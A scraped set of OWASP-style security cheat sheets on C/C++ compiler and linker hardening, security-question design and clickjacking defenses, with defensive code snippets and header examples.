As a concrete example, (and for those not familiar with C/C++ promotion rules), a warning will be issued if a signed integer is promoted to an unsigned integer and then compared because a side effect is -1 > 1 after promotion! GCC and Visual Studio will not currently catch, for example, SQL injections and other tainted data usage. For that, you will need a tool designed to perform data flow analysis or taint analysis.

Some in the development community resist static analysis or refute its results. For example, when static analysis warned the Linux kernel's sys_prctl was comparing an unsigned value against less than zero, Jesper Juhl offered a patch to clean up the code. Linus Torvalds howled \"No, you don't do this\u2026 GCC is crap\" (referring to compiling with warnings). For the full discussion, see [PATCH] Don't compare unsigned variable for <0 in sys_prctl() from the Linux Kernel mailing list.

The following sections will detail steps for three platforms. First is a typical GNU Linux based distribution offering GCC and Binutils, second is Clang and Xcode, and third is modern Windows platforms.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#distribution-hardening","title":"Distribution Hardening","text":"

Before discussing GCC and Binutils, it would be a good time to point out that some of the defenses discussed below are already present in a distribution. Unfortunately, it's design by committee, so what is present is usually only a mild variation of what is available (this way, everyone is mildly offended). For those who are purely worried about performance, you might be surprised to learn you have already taken the small performance hit without even knowing.

Linux and BSD distributions often apply some hardening without intervention via GCC Spec Files. If you are using Debian, Ubuntu, Linux Mint and family, see Debian Hardening. For Red Hat and Fedora systems, see New hardened build support (coming) in F16. Gentoo users should visit Hardened Gentoo.

You can see the settings being used by a distribution via gcc -dumpspecs. From Linux Mint 12 below, -fstack-protector (but not -fstack-protector-all) is used by default.

$ gcc -dumpspecs\n\u2026\n*link_ssp: %{fstack-protector:}\n\n*ssp_default: %{!fno-stack-protector:%{!fstack-protector-all:\n              %{!ffreestanding:%{!nostdlib:-fstack-protector}}}}\n\u2026\n

The \"SSP\" above stands for Stack Smashing Protector. SSP is a reimplementation of Hiroaki Etoh's work on IBM Pro Police Stack Detector. See Hiroaki Etoh's patch gcc stack-smashing protector and IBM's GCC extension for protecting applications from stack-smashing attacks for details.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#gccbinutils","title":"GCC/Binutils","text":"

GCC (the compiler collection) and Binutils (the assemblers, linkers, and other tools) are separate projects that work together to produce a final executable. Both the compiler and linker offer options to help you write safer and more secure code. The linker will produce code which takes advantage of platform security features offered by the kernel and PaX, such as no-exec stacks and heaps (NX) and Position Independent Executable (PIE).

The table below offers a set of compiler options to build your program. Static analysis warnings help catch mistakes early, while the linker options harden the executable at runtime. In the table below, \"GCC\" should be loosely taken as \"non-ancient distributions.\" While the GCC team considers 4.2 ancient, you will still encounter it on Apple and BSD platforms due to changes in GPL licensing around 2007. Refer to GCC Option Summary, Options to Request or Suppress Warnings and Binutils (LD) Command Line Options for usage details.

Noteworthy of special mention are -fno-strict-overflow and -fwrapv. The flags ensure the compiler does not remove statements that result in overflow or wrap. If your program only runs correctly using the flags, it is likely violating C/C++ rules on overflow and is illegal. If the program is illegal due to overflow or wrap checking, you should consider using safe-iop for C or David LeBlanc's SafeInt in C++.

For a project compiled and linked with hardened settings, some of those settings can be verified with the Checksec tool written by Tobias Klein. The checksec.sh script is designed to test standard Linux OS and PaX security features being used by an application. See the Trapkit web page for details.

GCC C Warning Options table:

a) Unlike Clang and -Weverything, GCC does not provide a switch to truly enable all warnings.

b) -fstack-protector guards functions with high risk objects such as C strings, while -fstack-protector-all guards all objects.

Additional C++ warnings which can be used include the following in Table 3. See GCC's Options Controlling C++ Dialect for additional options and details.

GCC C++ Warning Options table:

(The -Weffc++ option warns about violations of guidelines from Scott Meyers' Effective C++, Second Edition book.)

And additional Objective C warnings which are often useful include the following. See Options Controlling Objective-C and Objective-C++ Dialects for additional options and details.

GCC Objective C Warning Options table:

The use of aggressive warnings will produce spurious noise. The noise is a tradeoff - you can learn of potential problems at the cost of wading through some chaff. The following will help reduce spurious noise from the warning system:

Finally, a simple version-based Makefile example is shown below. This is different from the feature-based makefiles produced by auto tools (which will test for a particular feature and then define a symbol or configure a template file). Not all platforms use all options and flags. To address the issue you can pursue one of two strategies. First, you can ship with a weakened posture by servicing the lowest common denominator; or second, you can ship with everything in force. In the latter case, those who don't have a feature available will edit the makefile to accommodate their installation.

CXX=g++\nEGREP = egrep\n\u2026\n\nGCC_COMPILER = $(shell $(CXX) -v 2>&1 | $(EGREP) -i -c '^gcc version')\nGCC41_OR_LATER = $(shell $(CXX) -v 2>&1 | $(EGREP) -i -c '^gcc version (4\\.[1-9]|[5-9])')\n\u2026\n\nGNU_LD210_OR_LATER = $(shell $(LD) -v 2>&1 | $(EGREP) -i -c '^gnu ld .* (2\\.1[0-9]|2\\.[2-9])')\nGNU_LD214_OR_LATER = $(shell $(LD) -v 2>&1 | $(EGREP) -i -c '^gnu ld .* (2\\.1[4-9]|2\\.[2-9])')\n\u2026\n\nifeq ($(GCC_COMPILER),1)\nMY_CC_FLAGS += -Wall -Wextra -Wconversion\n    MY_CC_FLAGS += -Wformat=2 -Wformat-security\n    MY_CC_FLAGS += -Wno-unused-parameter\nendif\n\nifeq ($(GCC41_OR_LATER),1)\nMY_CC_FLAGS += -fstack-protector-all\nendif\n\nifeq ($(GCC42_OR_LATER),1)\nMY_CC_FLAGS += -Wstrict-overflow\nendif\n\nifeq ($(GCC43_OR_LATER),1)\nMY_CC_FLAGS += -Wtrampolines\nendif\n\nifeq ($(GNU_LD210_OR_LATER),1)\nMY_LD_FLAGS += -z,nodlopen -z,nodump\nendif\n\nifeq ($(GNU_LD214_OR_LATER),1)\nMY_LD_FLAGS += -z,noexecstack -z,noexecheap\nendif\n\nifeq ($(GNU_LD215_OR_LATER),1)\nMY_LD_FLAGS += -z,relro -z,now\nendif\n\nifeq ($(GNU_LD216_OR_LATER),1)\nMY_CC_FLAGS += -fPIE\n    MY_LD_FLAGS += -pie\nendif\n\n## Use 'override' to honor the user's command line\noverride CFLAGS := $(MY_CC_FLAGS) $(CFLAGS)\noverride CXXFLAGS := $(MY_CC_FLAGS) $(CXXFLAGS)\noverride LDFLAGS := $(MY_LD_FLAGS) $(LDFLAGS)\n\u2026\n
"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#clangxcode","title":"Clang/Xcode","text":"

Clang and LLVM have been aggressively developed since Apple lost its GPL compiler back in 2007 (due to Tivoization, which resulted in GPLv3). Since that time, a number of developers and Google have joined the effort. While Clang will consume most (all?) GCC/Binutils flags and switches, the project supports a number of its own options, including a static analyzer. In addition, Clang is relatively easy to build with additional diagnostics, such as Dr. John Regehr and Peng Li's Integer Overflow Checker (IOC).

IOC is incredibly useful, and has found bugs in a number of projects, including the Linux Kernel (include/linux/bitops.h, still unfixed), SQLite, PHP, Firefox (many still unfixed), LLVM, and Python. Future versions of Clang (Clang 3.3 and above) will allow you to enable the checks out of the box with -fsanitize=integer and -fsanitize=shift.

Clang options can be found at the Clang Compiler User's Manual. Clang does include an option to turn on all warnings - -Weverything. Use it with care, but use it regularly since you will get back a lot of noise along with issues you missed. For example, add -Weverything for production builds and make non-spurious issues a quality gate. Under Xcode, simply add -Weverything to CFLAGS and CXXFLAGS, as sketched below.
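
A hedged Makefile sketch, mirroring the compiler-detection pattern of the earlier Makefile example (the CLANG_COMPILER detection regex and the MY_CC_FLAGS variable are illustrative, not part of the original article):

CLANG_COMPILER = $(shell $(CXX) -v 2>&1 | $(EGREP) -i -c '^(apple )?(llvm|clang) version')\n\nifeq ($(CLANG_COMPILER),1)\nMY_CC_FLAGS += -Weverything\nendif\n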

In addition to compiler warnings, both static analysis and additional security checks can be performed. Reading on Clang's static analysis capabilities can be found at Clang Static Analyzer. Figure 1 below shows some of the security checks utilized by Xcode.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#visual-studio","title":"Visual Studio","text":"

Visual Studio offers a convenient Integrated Development Environment (IDE) for managing solutions and their settings. The section called \"Visual Studio Options\" discusses options which should be used with Visual Studio, and the section called \"Project Properties\" demonstrates incorporating those options into a solution's project.

The table below lists the compiler and linker switches which should be used under Visual Studio. Refer to Howard and LeBlanc's Writing Secure Code (Microsoft Press) for a detailed discussion; or Protecting Your Code with Visual C++ Defenses in Security Briefs by Michael Howard. In the table below, \"Visual Studio\" refers to nearly all versions of the development environment, including Visual Studio 5.0 and 6.0.

For a project compiled and linked with hardened settings, those settings can be verified with BinScope. BinScope is a verification tool from Microsoft that analyzes binaries to ensure that they have been built in compliance with Microsoft's Security Development Lifecycle (SDL) requirements and recommendations. See the BinScope Binary Analyzer download page for details.

a) See Jon Sturgeon's discussion of the switch at Off By Default Compiler Warnings in Visual C++.

a) When using /GS, there are a number of circumstances which affect the inclusion of a security cookie. For example, the guard is not used if there is no buffer in the stack frame, optimizations are disabled, or the function is declared naked or contains inline assembly.

b) #pragma strict_gs_check(on) should be used sparingly, but is recommended in high risk situations, such as when a source file parses input from the internet.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#warn-suppression","title":"Warn Suppression","text":"

From the tables above, a lot of warnings have been enabled to help detect possible programming mistakes. The potential mistakes are detected by the compiler, which carries around a lot of contextual information during its code analysis phase. At times, you will receive spurious warnings because the compiler is not that smart. It's understandable and even a good thing (how would you like to be out of a job because a program writes its own programs?). At times you will have to learn how to work with the compiler's warning system to suppress warnings. Notice what was not said: turn off the warnings.

Suppressing warnings placates the compiler for spurious noise so you can get to the issues that matter (you are separating the wheat from the chaff). This section will offer some hints and point out some potential minefields. First is an unused parameter (for example, argc or argv). Suppressing unused parameter warnings is especially helpful for C++ and interface programming, where parameters are often unused. For this warning, simply define an \"UNUSED\" macro and wrap the parameter:

#define UNUSED_PARAMETER(x) ((void)x)\n\u2026\n\nint main(int argc, char* argv[])\n{\nUNUSED_PARAMETER(argc);\nUNUSED_PARAMETER(argv);\n\u2026\n}\n

A potential minefield lies near \"comparing unsigned and signed\" values, and -Wconversion will catch it for you. This is because C/C++ promotion rules state the signed value will be promoted to an unsigned value and then compared. That means -1 > 1 after promotion! To fix this, you cannot blindly cast - you must first range test the value:

int x = GetX();\nunsigned int y = GetY();\n\nASSERT(x >= 0);\nif(!(x >= 0))\nthrow runtime_error(\"WTF??? X is negative.\");\n\nif(static_cast<unsigned int>(x) > y)\ncout << \"x is greater than y\" << endl;\nelse\ncout << \"x is not greater than y\" << endl;\n

Notice the code above will debug itself - you don't need to set a breakpoint to see if there is a problem with x. Just run the program and wait for it to tell you there is a problem. If there is a problem, the program will snap the debugger (and more importantly, not call a useless abort() as specified by Posix). It beats the snot out of printf statements that are removed when no longer needed or that pollute outputs.

Another conversion problem you will encounter is conversion between types, and -Wconversion will also catch it for you. The following will always have an opportunity to fail, and should light up like a Christmas tree:

struct sockaddr_in addr;\n\u2026\n\naddr.sin_port = htons(atoi(argv[2]));\n

The following would probably serve you much better. Notice atoi and friends are not used because they can silently fail. In addition, the code is instrumented so you don't need to waste a lot of time debugging potential problems:

const char* cstr = GetPortString();\n\nASSERT(cstr != NULL);\nif(!(cstr != NULL))\nthrow runtime_error(\"WTF??? Port string is not valid.\");\n\nistringstream iss(cstr);\nlong long t = 0;\niss >> t;\n\nASSERT(!(iss.fail()));\nif(iss.fail())\nthrow runtime_error(\"WTF??? Failed to read port.\");\n\n// Should this be a port above the reserved range ([0-1024] on Unix)?\nASSERT(t > 0);\nif(!(t > 0))\nthrow runtime_error(\"WTF??? Port is too small\");\n\nASSERT(t < static_cast<long long>(numeric_limits<unsigned int>::max()));\nif(!(t < static_cast<long long>(numeric_limits<unsigned int>::max())))\nthrow runtime_error(\"WTF??? Port is too large\");\n\n// OK to use port\nunsigned short port = static_cast<unsigned short>(t);\n\u2026\n

Again, notice the code above will debug itself - you don't need to set a breakpoint to see if there is a problem with port. This code will continue checking conditions, years after being instrumented (assuming you wrote the code to read a config file early in the project). There's no need to remove the ASSERTs as with printf since they are silent guardians.

Another useful suppression trick is to avoid ignoring return values. Not only is it useful to suppress the warning, it's required for correct code. For example, snprintf will alert you to truncations through its return value. You should not make them silent truncations by ignoring the warning or casting to void:

char path[PATH_MAX];\n\u2026\n\nint ret = snprintf(path, sizeof(path), \"%s/%s\", GetDirectory(), GetObjectName());\nASSERT(ret != -1);\nASSERT(!(ret >= sizeof(path)));\n\nif(ret == -1 || ret >= sizeof(path))\nthrow runtime_error(\"WTF??? Unable to build full object name\");\n\n// OK to use path\n\u2026\n

The problem is pandemic, and not just boring user land programs. Projects which offer high integrity code, such as SELinux, suffer silent truncations. The following is from an approved SELinux patch even though a comment was made that it suffered silent truncations in its security_compute_create_name function from compute_create.c.

int security_compute_create_raw(security_context_t scon,\n                                security_context_t tcon,\n                                security_class_t   tclass,\n                                security_context_t * newcon)\n{\n  char path[PATH_MAX];\n  char *buf;\n  size_t size;\n  int fd, ret;\n\n  if (!selinux_mnt) {\n    errno = ENOENT;\n    return -1;\n  }\n\n  snprintf(path, sizeof path, \"%s/create\", selinux_mnt);\n  fd = open(path, O_RDWR);\n

Unlike other examples, the above code will not debug itself, and you will have to set breakpoints and trace calls to determine the point of first failure. (And the code above gambles that the truncated file does not exist or is not under an adversary's control by blindly performing the open).

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#runtime","title":"Runtime","text":"

The previous sections concentrated on setting up your project for success. This section will examine additional hints for running with increased diagnostics and defenses. Not all platforms are created equal - on GNU Linux it is difficult or impossible to add hardening to a program after compiling and static linking, while Windows allows post-build hardening through a download. Remember, the goal is to find the point of first failure quickly so you can improve the reliability and security of the code.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#xcode","title":"Xcode","text":"

Xcode offers additional Code Diagnostics that can help find memory errors and object use problems. Schemes can be managed through the Product menu item, Scheme submenu item, and then Edit Scheme. From the editor, navigate to the Diagnostics tab. Four additional instruments that can be enabled for the debugging cycle are Scribble guards, Edge guards, Malloc guards, and Zombies.

There is one caveat with using some of the guards: Apple only provides them for the simulator, and not a device. In the past, the guards were available for both devices and simulators.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#windows","title":"Windows","text":"

Visual Studio offers a number of debugging aids for use during development. The aids are called Managed Debugging Assistants (MDAs). You can find the MDAs on the Debug menu, then the Exceptions submenu. MDAs allow you to tune your debugging experience by, for example, filtering the exceptions on which the debugger should break. For more details, see Stephen Toub's Let The CLR Find Bugs For You With Managed Debugging Assistants.

Finally, for runtime hardening, Microsoft has a helpful tool called EMET. EMET is the Enhanced Mitigation Experience Toolkit, and it allows you to apply runtime hardening to an executable which was built without it. It's very useful for utilities and other programs that were built without an SDLC.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html","title":"Choosing and Using Security Questions Cheat Sheet","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#introduction","title":"Introduction","text":"

WARNING: Security questions are no longer recognized as an acceptable authentication factor per NIST SP 800-63. Account recovery is just an alternate way to authenticate so it should be no weaker than regular authentication. See SP 800-63B sec 5.1.1.2 paragraph 4: Verifiers SHALL NOT prompt subscribers to use specific types of information (e.g., \u201cWhat was the name of your first pet?\u201d) when choosing memorized secrets.

If you are curious, please have a look at this study by Microsoft Research in 2009 and this study performed at Google in 2015. The accompanying Security blog update includes an infographic on the issues identified with security questions.

Please Note: While there are no acceptable uses of security questions in secure software, this cheat sheet provides guidance on how to choose strong security questions for legacy purposes.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#choosing-security-questions","title":"Choosing Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#desired-characteristics","title":"Desired Characteristics","text":"

Any security questions presented to users to reset forgotten passwords must meet the following characteristics:

Characteristic - Explanation
Memorable - The user must be able to recall the answer to the question, potentially years after creating their account.
Consistent - The answer to the question must not change over time.
Applicable - The user must be able to answer the question.
Confidential - The answer to the question must be hard for an attacker to obtain.
Specific - The answer should be clear to the user.
"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#types-of-security-questions","title":"Types of Security Questions","text":"

Security questions fall into two main types. With user defined security questions, the user must choose a question from a list, and provide an answer to the question. Common examples are \"What is your favourite colour?\" or \"What was your first car?\"

These are easy for applications to implement, as the additional information required is provided by the user when they first create their account. However, users will often choose weak or easily discovered answers to these questions.

System defined security questions are based on information that is already known about the user. This approach avoids having to ask the user to provide specific security questions and answers, and also prevents them from being able to choose weak details. However it relies on sufficient information already being stored about the user, and on this information being hard for an attacker to obtain.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#user-defined-security-questions","title":"User Defined Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#bad-questions","title":"Bad Questions","text":"

Any questions that do not have all of the characteristics discussed above should be avoided. The table below gives some examples of bad security questions:

Question - Problem
When is your date of birth? - Easy for an attacker to discover.
What is your memorable date? - Most users will just enter their birthday.
What is your favourite movie? - Likely to change over time.
What is your favourite cricket team? - Not applicable to most users.
What is the make and model of your first car? - Fairly small range of likely answers.

Additionally, the context of the application must be considered when deciding whether questions are good or bad. For example, a question such as \"What was your maths teacher's surname in your 8th year of school?\" would be very easy to guess if it was used in a virtual learning environment for your school (as other students probably know this information), but would be much stronger for an online gaming website.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#good-questions","title":"Good Questions","text":"

Many good security questions are not applicable to all users, so the best approach is to give the user a list of security questions that they can choose from. This allows you to have more specific questions (with more secure answers), while still providing every user with questions that they can answer.

The following list provides some examples of good questions:

Much like passwords, there is a risk that users will re-use recovery questions between different sites, which could expose the users if the other site is compromised. As such, there are benefits to having unique security questions that are unlikely to be shared between sites. An easy way to achieve this is to create more targeted questions based on the type of application. For example, on a share dealing platform, financial related questions such as \"What is the first company you owned shares in?\" could be used.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#allowing-users-to-write-their-own-questions","title":"Allowing Users to Write Their Own Questions","text":"

Allowing users to write their own security questions can result in them choosing very strong and unique questions that would be very hard for an attacker to guess. However, there is also a significant risk that users will choose weak questions. In some cases, users might even set a recovery question to a reminder of what their password is - allowing anyone guessing their email address to compromise their account.

As such, it is generally best not to allow users to write their own questions.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#restricting-answers","title":"Restricting Answers","text":"

Enforcing a minimum length for answers can prevent users from entering strings such as \"a\" or \"123\" for their answers. However, depending on the questions asked, it could also prevent users from being able to correctly answer the question. For example, asking for a first name or surname could result in a two letter answer such as \"Li\", and a colour-based question could be four letters such as \"blue\".

Answers should also be checked against a block list, including:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#renewing-security-questions","title":"Renewing Security Questions","text":"

If the security questions are not used as part of the main authentication process, then consider periodically prompting the user to review their security questions and verify that they still know the answers. This should give them a chance to update any answers that may have changed (although ideally this shouldn't happen with good questions), and increases the likelihood that they will remember them if they ever need to recover their account.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#system-defined-security-questions","title":"System Defined Security Questions","text":"

System defined security questions are based on information that is already known about the user. The users' personal details are often used, including the full name, address and date of birth. However these can easily be obtained by an attacker from social media, and as such provide a very weak level of authentication.

The questions that can be used will vary hugely depending on the application, and how much information is already held about the user. When deciding which bits of information may be usable for security questions, the following areas should be considered:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#using-security-questions","title":"Using Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#when-to-use-security-questions","title":"When to Use Security Questions","text":"

Applications should generally use a password along with a second authentication factor (such as an OTP code) to authenticate users. The combination of a password and security questions does not constitute MFA, as both factors are the same (i.e. something you know).

Security questions should never be relied upon as the sole mechanism to authenticate a user. However, they can provide a useful additional layer of security when other stronger factors are not available. Common cases where they would be used include:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#authentication-flow","title":"Authentication Flow","text":"

Security questions may be used as part of the main authentication flow to supplement passwords where MFA is not available. A typical authentication flow would be:

If the answers to the security questions are incorrect, then this should be counted as a failed login attempt, and the account lockout counter should be incremented for the user.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#forgotten-password-or-lost-mfa-token-flow","title":"Forgotten Password or Lost MFA Token Flow","text":"

Forgotten password functionality often provides a mechanism for attackers to enumerate user accounts if it is not correctly implemented. The following flow avoids this issue by only displaying the security questions once the user has proved ownership of the email address:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#how-to-use-security-questions","title":"How to Use Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#storing-answers","title":"Storing Answers","text":"

The answers to security questions may contain personal information about the user, and may also be re-used by the user between different applications. As such, they should be treated in the same way as passwords, and stored using a secure hashing algorithm such as Bcrypt. The password storage cheat sheet contains further guidance on this.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#comparing-answers","title":"Comparing Answers","text":"

Comparing the answers provided by the user with the stored answer in a case-insensitive manner makes it much easier for the user. The simplest way to do this is to convert the answer to lowercase before hashing it for storage, and then lowercase the user-provided answer before comparing the two.
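As a minimal sketch of storing and comparing a normalised answer (assuming a Node.js backend and the npm bcrypt package, both of which are illustrative choices):

const bcrypt = require('bcrypt');

// Normalise the answer so that "Fluffy " and "fluffy" compare equal.
function normalizeAnswer(answer) {
  return answer.trim().toLowerCase();
}

// Store only the hash of the normalised answer, never the answer itself.
async function storeAnswerHash(answer) {
  return bcrypt.hash(normalizeAnswer(answer), 12); // 12 is an illustrative work factor
}

// Compare a user-supplied answer against the stored hash.
async function verifyAnswer(providedAnswer, storedHash) {
  return bcrypt.compare(normalizeAnswer(providedAnswer), storedHash);
}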

It is also beneficial to give the user some indication of the format that they should use to enter answers. This could be done through input validation, or simply by recommending that the user enters their details in a specific format. For example, when asking for a date, indicating that the format should be \"DD/MM/YYYY\" will mean that the user doesn't have to try and guess what format they entered when registering.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#updating-answers","title":"Updating Answers","text":"

When the user updates the answers to their security questions, this should be treated as a sensitive operation within the application. As such, the user should be required to re-authenticate themselves by entering their password (or ideally using MFA), in order to prevent an attacker updating the questions if they gain temporary access to the user's account.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#multiple-security-questions","title":"Multiple Security Questions","text":"

When security questions are used, the user can either be asked a single question, or can be asked multiple questions at the same time. This provides a greater level of assurance, especially if the questions are diverse, as an attacker would need to obtain more information about the target user. A mixture of user-defined and system-defined questions can be very effective for this.

If the user is asked a single question out of a bank of possible questions, then this question should not be changed until the user has answered it correctly. If the attacker is allowed to try answering all of the different security questions, this greatly increases the chance that they will be able to guess or obtain the answer to one of them.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html","title":"Clickjacking Defense Cheat Sheet","text":""},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet is intended to provide guidance for developers on how to defend against Clickjacking, also known as UI redress attacks.

There are three main mechanisms that can be used to defend against these attacks:

Note that these mechanisms are all independent of each other, and where possible more than one of them should be implemented in order to provide defense in depth.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#defending-with-content-security-policy-csp-frame-ancestors-directive","title":"Defending with Content Security Policy (CSP) frame-ancestors directive","text":"

The frame-ancestors directive can be used in a Content-Security-Policy HTTP response header to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid Clickjacking attacks by ensuring that their content is not embedded into other sites.

frame-ancestors allows a site to authorize multiple domains using the normal Content Security Policy semantics.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#content-security-policy-frame-ancestors-examples","title":"Content-Security-Policy: frame-ancestors Examples","text":"

Common uses of CSP frame-ancestors:
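For illustration (trusted.example.com is a placeholder domain), common policies look like the following:

Content-Security-Policy: frame-ancestors 'none';
Content-Security-Policy: frame-ancestors 'self';
Content-Security-Policy: frame-ancestors 'self' https://trusted.example.com;

The first blocks framing entirely, the second allows framing only by pages from the same origin, and the third additionally authorizes a named trusted site.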

Note that the single quotes are required around self and none, but may not occur around other source expressions.

See the following documentation for further details and more complex examples:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#limitations","title":"Limitations","text":""},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#browser-support","title":"Browser Support","text":"

The following browsers support CSP frame-ancestors.

References:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#defending-with-x-frame-options-response-headers","title":"Defending with X-Frame-Options Response Headers","text":"

The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid Clickjacking attacks, by ensuring that their content is not embedded into other sites. Set the X-Frame-Options header for all responses containing HTML content. The possible values are \"DENY\", \"SAMEORIGIN\", or \"ALLOW-FROM uri\"

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#x-frame-options-header-types","title":"X-Frame-Options Header Types","text":"

There are three possible values for the X-Frame-Options header:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#browser-support_1","title":"Browser Support","text":"

The following browsers support X-Frame-Options headers.

References:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#implementation","title":"Implementation","text":"

To implement this protection, you need to add the X-Frame-Options HTTP response header to any page that you want to protect from being clickjacked via framebusting. One way to do this is to add the HTTP response header manually to every page. A possibly simpler way is to implement a filter that automatically adds the header to every page, or to add it at the Web Application Firewall or Web/Application Server level.
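As a sketch of the filter approach, assuming a Node.js/Express application (the framework choice is illustrative), a small middleware can add the header to every response:

const express = require('express');
const app = express();

// Add X-Frame-Options to every response so no page served by this app can be framed.
app.use((req, res, next) => {
  res.setHeader('X-Frame-Options', 'DENY');
  next();
});

app.get('/', (req, res) => res.send('Hello'));
app.listen(3000);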

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#common-defense-mistakes","title":"Common Defense Mistakes","text":"

Meta-tags that attempt to apply the X-Frame-Options directive DO NOT WORK. For example, <meta http-equiv=\"X-Frame-Options\" content=\"deny\"> will not work. You must apply the X-FRAME-OPTIONS directive as HTTP Response Header as described above.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#limitations_1","title":"Limitations","text":" "},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#defending-with-samesite-cookies","title":"Defending with SameSite Cookies","text":"

The SameSite cookie attribute defined in RFC 6265bis is primarily intended to defend against cross-site request forgery (CSRF); however it can also provide protection against Clickjacking attacks.

Cookies with a SameSite attribute of either strict or lax will not be included in requests made to a page within an <iframe>. This means that if the session cookies are marked as SameSite, any Clickjacking attack that requires the victim to be authenticated will not work, as the cookie will not be sent. An article on the Netsparker blog provides further details on which types of requests cookies are sent for with the different SameSite policies.
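For example, a session cookie set with the SameSite attribute might look like this (the cookie name and value are illustrative):

Set-Cookie: JSESSIONID=xxxxx; SameSite=Strict; HttpOnly; Secure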

This approach is discussed on the JavaScript.info website.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#limitations_2","title":"Limitations","text":"

If the Clickjacking attack does not require the user to be authenticated, this attribute will not provide any protection.

Additionally, while SameSite attribute is supported by most modern browsers, there are still some users (approximately 6% as of November 2020) with browsers that do not support it.

The use of this attribute should be considered as part of a defence-in-depth approach, and it should not be relied upon as the sole protective measure against Clickjacking.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#best-for-now-legacy-browser-frame-breaking-script","title":"Best-for-now Legacy Browser Frame Breaking Script","text":"

One way to defend against clickjacking is to include a \"frame-breaker\" script in each page that should not be framed. The following methodology will prevent a webpage from being framed even in legacy browsers that do not support the X-Frame-Options header.

In the document HEAD element, add the following:

First apply an ID to the style element itself:

<style id=\"antiClickjack\">\nbody{display:none !important;}\n</style>\n

Then, delete that style by its ID immediately after in the script:

<script type=\"text/javascript\">\nif\u00a0(self\u00a0===\u00a0top)\u00a0{\nvar\u00a0antiClickjack\u00a0=\u00a0document.getElementById(\"antiClickjack\");\nantiClickjack.parentNode.removeChild(antiClickjack);\n}\u00a0else\u00a0{\ntop.location\u00a0=\u00a0self.location;\n}\n</script>\n

This way, everything can be in the document HEAD and you only need one method/taglib in your API.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#windowconfirm-protection","title":"window.confirm() Protection","text":"

The use of X-Frame-Options or a frame-breaking script is a more fail-safe method of clickjacking protection. However, in scenarios where content must be frameable, then a window.confirm() can be used to help mitigate Clickjacking by informing the user of the action they are about to perform.

Invoking window.confirm() will display a popup that cannot be framed. If the window.confirm() originates from within an iframe with a different domain than the parent, then the dialog box will display what domain the window.confirm() originated from. In this scenario the browser is displaying the origin of the dialog box to help mitigate Clickjacking attacks. It should be noted that Internet Explorer is the only known browser that does not display the domain that the window.confirm() dialog box originated from. To address this issue with Internet Explorer, ensure that the message within the dialog box contains contextual information about the type of action being performed. For example:

<script type=\"text/javascript\">\nvar\u00a0action_confirm\u00a0=\u00a0window.confirm(\"Are\u00a0you\u00a0sure\u00a0you\u00a0want\u00a0to\u00a0delete\u00a0your\u00a0youtube\u00a0account?\")\nif\u00a0(action_confirm)\u00a0{\n//...\u00a0Perform\u00a0action\n}\u00a0else\u00a0{\n//...\u00a0The\u00a0user\u00a0does\u00a0not\u00a0want\u00a0to\u00a0perform\u00a0the\u00a0requested\u00a0action.`\n}\n</script>\n
